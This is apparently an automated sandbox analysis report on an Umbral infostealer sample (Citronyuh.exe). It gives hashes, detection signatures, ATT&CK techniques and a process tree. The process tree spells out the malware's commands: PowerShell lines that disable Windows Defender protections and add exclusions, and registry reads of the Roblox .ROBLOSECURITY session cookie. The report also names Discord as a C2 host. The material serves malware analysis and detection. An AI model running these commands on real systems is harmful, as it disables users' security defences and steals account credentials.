Overview
overview
10Static
static
10citrontopp...uh.exe
windows7-x64
10citrontopp...uh.exe
windows10-2004-x64
10citrontopp...uh.exe
windows7-x64
7citrontopp...uh.exe
windows10-2004-x64
9citrontopp...on.exe
windows7-x64
10citrontopp...on.exe
windows10-2004-x64
10citrontopp...on.exe
windows7-x64
10citrontopp...on.exe
windows10-2004-x64
10Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
12-08-2024 09:36
Behavioral task
behavioral1
Sample
citrontoppest/citrontoppest/Citronyuh.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
citrontoppest/citrontoppest/Citronyuh.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
citrontoppest/citrontoppest/citrontoppest/citronuh.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
citrontoppest/citrontoppest/citrontoppest/citronuh.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
citrontoppest/citrontoppest/citrontoppest/updatechecker/updatecheckercitron.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
citrontoppest/citrontoppest/citrontoppest/updatechecker/updatecheckercitron.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
citrontoppest/citrontoppest/updatechecker/updatecheckercitron.exe
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
citrontoppest/citrontoppest/updatechecker/updatecheckercitron.exe
Resource
win10v2004-20240802-en
General
-
Target
citrontoppest/citrontoppest/Citronyuh.exe
-
Size
227KB
-
MD5
867db374eb53605b40be55b3c1541e3c
-
SHA1
26999780ea28d4902f2d4350bbbf5dab63591fd5
-
SHA256
ca03916c2b0b804c70ab17755265b3db48fa97480aad3494764f45a1e746bb31
-
SHA512
5210541fc651210c6aae04c78347db84c8e09a4f320e072f390d63fd03587d2764548ca82b41e23631457e852b093e5af3152275b636d55aa58212d6b48e14a0
-
SSDEEP
6144:eloZMLrIkd8g+EtXHkv/iD4emzBywvrYyhkijD6C+b8e1m8i:IoZ0L+EP8emzBywvrYyhkijD6R6
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2812-1-0x0000000000DA0000-0x0000000000DE0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2540 powershell.exe 2368 powershell.exe 2848 powershell.exe 824 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Citronyuh.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 11 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1340 wmic.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2812 Citronyuh.exe 2540 powershell.exe 2368 powershell.exe 2848 powershell.exe 2032 powershell.exe 824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2812 Citronyuh.exe Token: SeIncreaseQuotaPrivilege 1352 wmic.exe Token: SeSecurityPrivilege 1352 wmic.exe Token: SeTakeOwnershipPrivilege 1352 wmic.exe Token: SeLoadDriverPrivilege 1352 wmic.exe Token: SeSystemProfilePrivilege 1352 wmic.exe Token: SeSystemtimePrivilege 1352 wmic.exe Token: SeProfSingleProcessPrivilege 1352 wmic.exe Token: SeIncBasePriorityPrivilege 1352 wmic.exe Token: SeCreatePagefilePrivilege 1352 wmic.exe Token: SeBackupPrivilege 1352 wmic.exe Token: SeRestorePrivilege 1352 wmic.exe Token: SeShutdownPrivilege 1352 wmic.exe Token: SeDebugPrivilege 1352 wmic.exe Token: SeSystemEnvironmentPrivilege 1352 wmic.exe Token: SeRemoteShutdownPrivilege 1352 wmic.exe Token: SeUndockPrivilege 1352 wmic.exe Token: SeManageVolumePrivilege 1352 wmic.exe Token: 33 1352 wmic.exe Token: 34 1352 wmic.exe Token: 35 1352 wmic.exe Token: SeIncreaseQuotaPrivilege 1352 wmic.exe Token: SeSecurityPrivilege 1352 wmic.exe Token: SeTakeOwnershipPrivilege 1352 wmic.exe Token: SeLoadDriverPrivilege 1352 wmic.exe Token: SeSystemProfilePrivilege 1352 wmic.exe Token: SeSystemtimePrivilege 1352 wmic.exe Token: SeProfSingleProcessPrivilege 1352 wmic.exe Token: SeIncBasePriorityPrivilege 1352 wmic.exe Token: SeCreatePagefilePrivilege 1352 wmic.exe Token: SeBackupPrivilege 1352 wmic.exe Token: SeRestorePrivilege 1352 wmic.exe Token: SeShutdownPrivilege 1352 wmic.exe Token: SeDebugPrivilege 1352 wmic.exe Token: SeSystemEnvironmentPrivilege 1352 wmic.exe Token: SeRemoteShutdownPrivilege 1352 wmic.exe Token: SeUndockPrivilege 1352 wmic.exe Token: SeManageVolumePrivilege 1352 wmic.exe Token: 33 1352 wmic.exe Token: 34 1352 wmic.exe Token: 35 1352 wmic.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeIncreaseQuotaPrivilege 1708 wmic.exe Token: SeSecurityPrivilege 1708 wmic.exe Token: SeTakeOwnershipPrivilege 1708 wmic.exe Token: SeLoadDriverPrivilege 1708 wmic.exe Token: SeSystemProfilePrivilege 1708 wmic.exe Token: SeSystemtimePrivilege 1708 wmic.exe Token: SeProfSingleProcessPrivilege 1708 wmic.exe Token: SeIncBasePriorityPrivilege 1708 wmic.exe Token: SeCreatePagefilePrivilege 1708 wmic.exe Token: SeBackupPrivilege 1708 wmic.exe Token: SeRestorePrivilege 1708 wmic.exe Token: SeShutdownPrivilege 1708 wmic.exe Token: SeDebugPrivilege 1708 wmic.exe Token: SeSystemEnvironmentPrivilege 1708 wmic.exe Token: SeRemoteShutdownPrivilege 1708 wmic.exe Token: SeUndockPrivilege 1708 wmic.exe Token: SeManageVolumePrivilege 1708 wmic.exe Token: 33 1708 wmic.exe Token: 34 1708 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2812 wrote to memory of 1352 2812 Citronyuh.exe 31 PID 2812 wrote to memory of 1352 2812 Citronyuh.exe 31 PID 2812 wrote to memory of 1352 2812 Citronyuh.exe 31 PID 2812 wrote to memory of 2540 2812 Citronyuh.exe 34 PID 2812 wrote to memory of 2540 2812 Citronyuh.exe 34 PID 2812 wrote to memory of 2540 2812 Citronyuh.exe 34 PID 2812 wrote to memory of 2368 2812 Citronyuh.exe 36 PID 2812 wrote to memory of 2368 2812 Citronyuh.exe 36 PID 2812 wrote to memory of 2368 2812 Citronyuh.exe 36 PID 2812 wrote to memory of 2848 2812 Citronyuh.exe 38 PID 2812 wrote to memory of 2848 2812 Citronyuh.exe 38 PID 2812 wrote to memory of 2848 2812 Citronyuh.exe 38 PID 2812 wrote to memory of 2032 2812 Citronyuh.exe 40 PID 2812 wrote to memory of 2032 2812 Citronyuh.exe 40 PID 2812 wrote to memory of 2032 2812 Citronyuh.exe 40 PID 2812 wrote to memory of 1708 2812 Citronyuh.exe 42 PID 2812 wrote to memory of 1708 2812 Citronyuh.exe 42 PID 2812 wrote to memory of 1708 2812 Citronyuh.exe 42 PID 2812 wrote to memory of 2480 2812 Citronyuh.exe 44 PID 2812 wrote to memory of 2480 2812 Citronyuh.exe 44 PID 2812 wrote to memory of 2480 2812 Citronyuh.exe 44 PID 2812 wrote to memory of 2288 2812 Citronyuh.exe 46 PID 2812 wrote to memory of 2288 2812 Citronyuh.exe 46 PID 2812 wrote to memory of 2288 2812 Citronyuh.exe 46 PID 2812 wrote to memory of 824 2812 Citronyuh.exe 48 PID 2812 wrote to memory of 824 2812 Citronyuh.exe 48 PID 2812 wrote to memory of 824 2812 Citronyuh.exe 48 PID 2812 wrote to memory of 1340 2812 Citronyuh.exe 50 PID 2812 wrote to memory of 1340 2812 Citronyuh.exe 50 PID 2812 wrote to memory of 1340 2812 Citronyuh.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\Citronyuh.exe"C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\Citronyuh.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\Citronyuh.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2480
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:824
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1340
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53cd1caadefd98c40a27930092e5a2af2
SHA1d9cbec267e0eb209f16346331e942725824071bc
SHA256dc3df73b024ac044981ff02a441f966f224111a6afeddfe040b5d20feac6f609
SHA5121a88a4a590ffa0741c8ad436645473f83f4c281509e3c73141a14418da2feddd58bffad7a656ffead6e140dfd9d92efe53a68d3ac419322cd1e03ccb0aad4383